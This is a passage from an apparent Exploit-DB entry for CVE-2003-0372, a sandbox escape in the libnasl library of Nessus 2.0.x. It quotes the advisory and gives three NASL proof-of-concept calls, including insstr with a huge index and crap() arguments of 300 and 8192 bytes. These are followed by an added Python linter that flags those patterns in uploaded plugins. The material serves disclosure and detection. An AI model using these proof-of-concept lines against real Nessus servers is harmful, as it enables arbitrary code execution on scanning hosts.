Exploit Nessus 2.0.x - LibNASL Arbitrary Code Execution

Exploiter

18 Dec 2022
EDB-ID: 22634
EDB verification: Passed
Author: SIR MORDRED
Vulnerability type: DOS
Platform: MULTIPLE
CVE: CVE-2003-0372
Publication date: 2003-05-22
Code:
source: https://www.securityfocus.com/bid/7664/info

Nessus has reported that various flaws have been discovered in the 'libnasl' library used by the Nessus application. As a result, a malicious NASL script may be able to break outside of the established sandbox environment and execute arbitrary commands on the local system.

Note that this malicious script must be a legitimate plugin that has been uploaded to the Nessus server. Furthermore, the affected Nessus application must have enabled the 'plugins_upload' option (which is disabled by default).

insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) );
 
Source: www.exploit-db.com
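
For review of plugins on a server where 'plugins_upload' is enabled, the following is an added example, not part of the original post or of Nessus: a heuristic pre-upload check that flags the three call patterns quoted above. The `lint` function, the rule names and the 256-byte threshold are assumptions chosen for illustration.

```python
import re

# Constructed sample: the three calls quoted in the advisory, plus a benign line.
SAMPLE = '''insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) );
display("scan done");
'''

MAX_ARG_LEN = 256  # assumed review threshold, not a documented libnasl limit
# Parameters the advisory's sample calls fill with oversized crap() data.
WATCHED = {"scanner_add_port": {"proto"}, "ftp_log_in": {"user", "pass"}}

STRINGS = re.compile(r'"[^"]*"|\'[^\']*\'')
NUMBER = re.compile(r"\b(?:0x[0-9a-fA-F]+|\d+)\b")
INSSTR_LITERAL = re.compile(r'\binsstr\s*\(\s*"([^"]*)"')
INSSTR_ARGS = re.compile(r"\binsstr\s*\(([^)]*)\)")
WATCHED_CALL = re.compile(r"\b(scanner_add_port|ftp_log_in)\s*\(")
CRAP_PARAM = re.compile(r"(\w+)\s*:\s*crap\s*\([^)]*?length\s*:\s*(0x[0-9a-fA-F]+|\d+)")

def to_int(token):
    return int(token, 16) if token.lower().startswith("0x") else int(token)

def lint(source):
    """Return (line number, rule) pairs for calls that need manual review."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        bare = STRINGS.sub('""', line)  # blank string bodies so digits in them are ignored
        literal = INSSTR_LITERAL.search(line)
        args = INSSTR_ARGS.search(bare)
        if args:
            # Index is suspicious if negative as a signed 32-bit value,
            # or past the end of a literal first argument.
            limit = len(literal.group(1)) if literal else None
            for token in NUMBER.findall(args.group(1)):
                value = to_int(token)
                if value >= 2**31 or (limit is not None and value > limit):
                    findings.append((lineno, "insstr-index"))
                    break
        call = WATCHED_CALL.search(bare)
        if call:
            for param, length in CRAP_PARAM.findall(bare):
                if param in WATCHED[call.group(1)] and to_int(length) > MAX_ARG_LEN:
                    findings.append((lineno, f"long-crap:{call.group(1)}.{param}"))
    return findings

if __name__ == "__main__":
    for lineno, rule in lint(SAMPLE):
        print(f"line {lineno}: {rule}")
```

The check is line-based and does not follow variables or nested calls, so a clean result is not proof that a plugin is safe.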
